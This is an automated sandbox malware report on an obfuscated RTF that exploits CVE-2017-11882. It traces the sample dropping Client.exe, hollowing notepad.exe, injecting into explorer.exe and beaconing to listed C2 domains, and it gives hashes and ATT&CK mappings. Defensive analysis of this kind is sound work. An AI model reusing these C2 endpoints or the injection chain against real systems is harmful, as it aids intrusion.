Source: Yara match | File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques are listed per tactic; a number in parentheses is the count of matched signatures for that technique, and techniques without one are unmatched matrix cells.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Shared Modules (1), Exploitation for Client Execution (43), Command and Scripting Interpreter (1), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Privilege Escalation: DLL Side-Loading (1), Process Injection (812), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (4), Software Packing (3), DLL Side-Loading (1), Rootkit (1), Masquerading (1), Virtualization/Sandbox Evasion (31), Process Injection (812)
Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (1), System Information Discovery (113), Security Software Discovery (221), Process Discovery (2), Virtualization/Sandbox Evasion (31), Remote System Discovery (1), System Network Configuration Discovery (1), Network Service Scanning, System Network Connections Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
Collection: Archive Collected Data (1), Credential API Hooking (1), Clipboard Data (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (3), Application Layer Protocol (13), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction
Behavior Graph (ID: 680528; Sample: SecuriteInfo.com.Exploit.Rt...; Start date: 08/08/2022; Architecture: WINDOWS; Score: 100)

Sample-level signatures: Snort IDS alert for network traffic; Document contains OLE streams which likely are hidden ActiveX objects; Malicious sample detected (through community Yara rule); 14 other signatures

Process tree (bracketed numbers are the graph's per-process counts of created registry values and created files):

EQNEDT32.EXE [47]
  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  -> cmd.exe (started)
     -> Client.exe (started)
        Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures
        -> notepad.exe (started)
           Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
           -> explorer.exe (injected)
              DNS/IP: www.best-boy.net 104.167.67.175, 49172, 80, ESITEDUS, United States; thegoldencamel.online 66.235.200.170, 49171, 80, CLOUDFLARENETUS, United States; www.thegoldencamel.online
              System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
              -> ipconfig.exe (started)
                 Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                 -> cmd.exe (started)

WINWORD.EXE [292, 21]
  Dropped: C:\Users\user\AppData\Local\Temp\Client.exe (PE32); C:\Users\user\...\Client.exe:Zone.Identifier (ASCII); ~WRF{4F98E955-E40B...E-253D7E3CD6E7}.tmp (Composite)
  Document exploit detected (creates forbidden files)

Initial Sample
Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | 43% | Virustotal | | Browse
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | 22% | ReversingLabs | Document-RTF.Trojan.Heuristic |

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |
C:\Users\user\AppData\Local\Temp\Client.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Client.exe | 24% | ReversingLabs | ByteCode-MSIL.Spyware.Noon |

Unpacked PE Files
Source | Detection | Scanner | Label | Link | Download
9.0.notepad.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
9.2.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
9.0.notepad.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
9.0.notepad.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
9.0.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
9.0.notepad.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
9.0.notepad.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
www.lundadonate.xyz/nb30/ | 1% | Virustotal | | Browse
www.lundadonate.xyz/nb30/ | 100% | Avira URL Cloud | malware |
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://treyresearch.net | 0% | URL Reputation | safe |
http://java.sun.com | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 | 0% | Avira URL Cloud | safe |
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
thegoldencamel.online | 66.235.200.170 | true | true | | unknown
www.best-boy.net | 104.167.67.175 | true | true | | unknown
www.thegoldencamel.online | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.lundadonate.xyz/nb30/ | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | low
http://www.best-boy.net/nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 | true | Avira URL Cloud: safe | unknown
http://www.thegoldencamel.online/nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerp | explorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 0000000A.00000000.1004860034.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.988141924.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://java.sun.com | explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 0000000A.00000000.1005858941.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000A.00000000.996446358.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011537608.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995286555.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996486805.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980535513.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.980217883.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 0000000A.00000000.979092097.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.962364346.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030297831.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012512071.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012445260.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1012221961.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979280066.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.996182777.0000000008617000.00000004.00000001.00020000.00000000.sdmp | false
                                        high
                                        http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.970687640.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.%s.comPAexplorer.exe, 0000000A.00000000.957907821.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        low
                                        http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://support.mozilla.orgexplorer.exe, 0000000A.00000000.1027469570.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.984634900.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.999499813.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.954363521.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.969152262.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1007082449.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.991189675.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1032583619.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000006.00000002.951081960.0000000002641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.973857047.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low
IP              Domain                 Country        ASN    ASN Name         Malicious
104.167.67.175  www.best-boy.net       United States  22552  ESITEDUS         true
66.235.200.170  thegoldencamel.online  United States  13335  CLOUDFLARENETUS  true
                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680528
Start date and time:2022-08-08 18:37:10 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 33s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.19912 (renamed file extension from 19912 to rtf)
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winRTF@11/9@2/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 15% (good quality ratio 13.8%)
                                                • Quality average: 66.8%
                                                • Quality standard deviation: 30.4%
                                                HCA Information:
                                                • Successful, ratio: 76%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
Time      Type             Description
18:38:17  API Interceptor  28x Sleep call for process: EQNEDT32.EXE modified
18:38:18  API Interceptor  179x Sleep call for process: Client.exe modified
18:38:41  API Interceptor  5x Sleep call for process: notepad.exe modified
18:39:25  API Interceptor  201x Sleep call for process: ipconfig.exe modified
18:39:56  API Interceptor  1x Sleep call for process: explorer.exe modified
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):968192
                                                Entropy (8bit):7.221905189702602
                                                Encrypted:false
                                                SSDEEP:12288:924dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:Ts9RauHN/5wa8/L9UueAxmfHk
                                                MD5:BE1CF0179CC129FE5BA102A5EFFA515E
                                                SHA1:4A0468FAB21F7C2054F728530E9502C294B92356
                                                SHA-256:64249AF03BFA82B6DA362EAF94864CF4698BECD35869586F43101E62D1B706AF
                                                SHA-512:FF189C9764C3AF8AA4F33F268F0B50FBFA6E4A938F1F8059BFDF60D1409029CBDEBC1D926E4AEF1BA5F616B87BB5D62FD07A175481BD9F87BB6BF58E27394FA8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: John Davison
                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, Author: ReversingLabs
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:low
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):1.1722028273607172
                                                Encrypted:false
                                                SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                Malicious:false
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):954368
                                                Entropy (8bit):7.255862647028007
                                                Encrypted:false
                                                SSDEEP:12288:f24dTkV9VXtdGI1HNDT5wQjG6EXPGc/16/PxuepSxmwCD8ik:hs9RauHN/5wa8/L9UueAxmfHk
                                                MD5:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                SHA1:EE56EAF9288D5315D51E23C32CD8B11CEFA15E2F
                                                SHA-256:40A539EBB55B0A6A2F1529A733EAF3AA1C48CE467EAEAAA56C851ABF9BDA3006
                                                SHA-512:8CBC3FCF0AD0B985BBA9D489278FB4E8A40F56561B1FFDE8EB8D79EB9E29C0BC224123B209844EB4E3CD758BCBF0FF17FDCAD98D44E7E602F42D6DA2D0541F5C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 24%
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:true
                                                Preview:[ZoneTransfer]..ZoneId=3..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 9 00:38:02 2022, mtime=Tue Aug 9 00:38:02 2022, atime=Tue Aug 9 00:38:12 2022, length=2870044, window=hide
                                                Category:dropped
                                                Size (bytes):1199
                                                Entropy (8bit):4.599606484788339
                                                Encrypted:false
                                                SSDEEP:24:8BA/XTRKJive0lNHCn9DJeAHCn9tDv3qm1u7D:8BA/XT0iflNHCnJJbHCnmg0D
                                                MD5:FB70B386249D4133C4BAB75CDA40C2F0
                                                SHA1:6EA10AEB53EB1DA991622FD5A9D03AB1A3E989F3
                                                SHA-256:099321B7080DB54AF4916A8A2E456643BAC0B512835E3F3DDFD91125804F3321
                                                SHA-512:F2B59A978A17D42544839F66970F24A64B65EC2EA6F3C7223E12D2413F0D12E56818A272FFAED073173CCB2A9582901018AE6438FEDCB64C26CFB7DD68C27EF8
                                                Malicious:false
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):146
                                                Entropy (8bit):4.9658261704362445
                                                Encrypted:false
                                                SSDEEP:3:bDuMJluscbcTLqjQWC0LUZAlmxW9rbcTLqjQWC0LUZAlv:bCVwTeS0LHjrwTeS0LH1
                                                MD5:E9FAD3CF5FB87FFCDE0A5322116B439E
                                                SHA1:3FD3EC2D5452FE415C4FB88E3A4362C4F9717D71
                                                SHA-256:811BCE8DBC32271417CC1D639AE63C548BF7641ED1CF3F64531213A332A0C4D5
                                                SHA-512:B49BFBC8009820B9C8B209C7D112A55F1CC30C44D49B14CC1EC748EB1A6AAAB2C588F77E8D38E5475B7E67748E8EE43F8E610800953D1A495B24060144278469
                                                Malicious:false
                                                Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK=0..
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707525
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                                                MD5:7CFA404FD881AF8DF49EA584FE153C61
                                                SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                                                SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                                                SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                                                Malicious:false
                                                File type:Rich Text Format data, version 1, unknown character set
                                                Entropy (8bit):4.770913997735828
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
                                                File size:2870044
                                                MD5:8bfea104ae681494896379e3c647f6ae
                                                SHA1:aaf97d8a987c5060ff06c4031030000d53d3cb31
                                                SHA256:2975edb12c8e70b56a89c7fb82e4eb347b992b4147dcfa2a20efd16d54c33eb4
                                                SHA512:4803dad9f9afaec9270e2d831de98152fa7307e86114f2d03b950e5486495f7bba97cb0752e13be9ac99756942c219975082b6b6f7877f8e4e3f15bd8403dc9d
                                                SSDEEP:24576:999sNt+S9dUJrMbKlvqr/OwJJZ5ic4Uez5NwoQu37WBQ3a95HX:Y
                                                TLSH:CCD5A570B1B535C6E26F0172429FBC59521738C3B3C62D88815DEAF62ED4B7A7B41A0E
